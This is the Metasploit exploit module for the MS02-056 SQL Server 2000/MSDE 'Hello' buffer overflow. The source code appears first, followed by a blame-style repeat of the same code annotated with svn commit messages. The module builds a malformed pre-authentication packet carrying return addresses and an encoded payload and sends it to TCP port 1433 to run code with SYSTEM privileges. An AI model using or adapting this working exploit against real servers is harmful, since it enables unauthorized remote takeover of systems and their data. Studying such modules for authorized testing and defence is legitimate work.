metasploit-framework/modules/exploits/windows/mssql/ms02_056_hello.rb

require 'msf/core'

module Msf

class Exploits::Windows::Mssql::MS02_056_HelloOverflow < Msf::Exploit::Remote

	include Exploit::Remote::MSSQL

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'MSSQL 2000/MSDE Hello Buffer Overflow',
			'Description'    => %q{
				By sending malformed data to TCP port 1433, an
				unauthenticated remote attacker could overflow a buffer and
				possibly execute code on the server with SYSTEM level
				privileges. This module should work against any vulnerable
				SQL Server 2000 or MSDE install (< SP3).
					
			},
			'Author'         => [ 'MC <y0@w00t-shell.net>' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'MSB', 'MS02-056'],
					[ 'CVE', '2002-1123'],
					[ 'MIL', '43'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 512,
					'BadChars' => "\x00",
				},
			'Targets'        => 
				[
					[ 
						'MSSQL 2000 / MSDE <= SP2',
						{
							'Platform' => 'win',
							'Rets'     => [0x42b68aba, 0x42d01e50],
						},
					],
				],
			'Platform'       => 'win',
			'DisclosureDate' => 'Aug 5 2002',
			'DefaultTarget' => 0))
	end
	
	def check
		info = mssql_ping
		if (info['ServerName'])
			print_status("SQL Server Information:")
			info.each_pair { |k,v|
				print_status("   #{k + (" " * (15-k.length))} = #{v}")
			}
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect
		buf = "\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b" +
		      "\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x02" +
			  "\x10\x00\x00\x00" +
			  Rex::Text.rand_text_english(528, payload_badchars) +
			  "\x1B\xA5\xEE\x34" + 
			  Rex::Text.rand_text_english(4, payload_badchars) +
			  [ target['Rets'][0] ].pack('V') +
			  [ target['Rets'][1], target['Rets'][1] ].pack('VV') +
			  '3333' +
			  [ target['Rets'][1], target['Rets'][1] ].pack('VV') +
		      Rex::Text.rand_text_english(88, payload_badchars) +
			  payload.encoded +
			  "\x00\x24\x01\x00\x00"
			  
		sock.put(buf)
		
		handler
		disconnect
	end
	
end
end
Mssql code! git-svn-id: file:///home/svn/incoming/trunk@3122 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-26 11:16:36 +00:00			`require 'msf/core'`

			`module Msf`

			`class Exploits::Windows::Mssql::MS02_056_HelloOverflow < Msf::Exploit::Remote`

			`include Exploit::Remote::MSSQL`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'MSSQL 2000/MSDE Hello Buffer Overflow',`
			`'Description' => %q{`
			`By sending malformed data to TCP port 1433, an`
			`unauthenticated remote attacker could overflow a buffer and`
			`possibly execute code on the server with SYSTEM level`
			`privileges. This module should work against any vulnerable`
			`SQL Server 2000 or MSDE install (< SP3).`

			`},`
			`'Author' => [ 'MC <y0@w00t-shell.net>' ],`
BSD license the default for non-msfdev created modules. git-svn-id: file:///home/svn/incoming/trunk@3636 4d416f70-5f16-0410-b530-b9f4589650da 2006-05-06 16:34:39 +00:00			`'License' => BSD_LICENSE,`
Mssql code! git-svn-id: file:///home/svn/incoming/trunk@3122 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-26 11:16:36 +00:00			`'Version' => '$Revision$',`
			`'References' =>`
			`[`
			`[ 'MSB', 'MS02-056'],`
			`[ 'CVE', '2002-1123'],`
			`[ 'MIL', '43'],`

			`],`
			`'Privileged' => true,`
			`'Payload' =>`
			`{`
			`'Space' => 512,`
			`'BadChars' => "\x00",`
			`},`
			`'Targets' =>`
			`[`
			`[`
			`'MSSQL 2000 / MSDE <= SP2',`
			`{`
			`'Platform' => 'win',`
			`'Rets' => [0x42b68aba, 0x42d01e50],`
			`},`
			`],`
			`],`
* add platform git-svn-id: file:///home/svn/incoming/trunk@3535 4d416f70-5f16-0410-b530-b9f4589650da 2006-02-21 14:27:28 +00:00			`'Platform' => 'win',`
Mssql code! git-svn-id: file:///home/svn/incoming/trunk@3122 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-26 11:16:36 +00:00			`'DisclosureDate' => 'Aug 5 2002',`
			`'DefaultTarget' => 0))`
			`end`

			`def check`
			`info = mssql_ping`
			`if (info['ServerName'])`
			`print_status("SQL Server Information:")`
			`info.each_pair { \|k,v\|`
			`print_status(" #{k + (" " * (15-k.length))} = #{v}")`
			`}`
			`return Exploit::CheckCode::Detected`
			`end`
			`return Exploit::CheckCode::Safe`
			`end`

			`def exploit`
			`connect`
			`buf = "\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b" +`
			`"\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x02" +`
			`"\x10\x00\x00\x00" +`
			`Rex::Text.rand_text_english(528, payload_badchars) +`
			`"\x1B\xA5\xEE\x34" +`
			`Rex::Text.rand_text_english(4, payload_badchars) +`
			`[ target['Rets'][0] ].pack('V') +`
			`[ target['Rets'][1], target['Rets'][1] ].pack('VV') +`
			`'3333' +`
			`[ target['Rets'][1], target['Rets'][1] ].pack('VV') +`
			`Rex::Text.rand_text_english(88, payload_badchars) +`
			`payload.encoded +`
			`"\x00\x24\x01\x00\x00"`

			`sock.put(buf)`

			`handler`
			`disconnect`
			`end`

			`end`
			`end`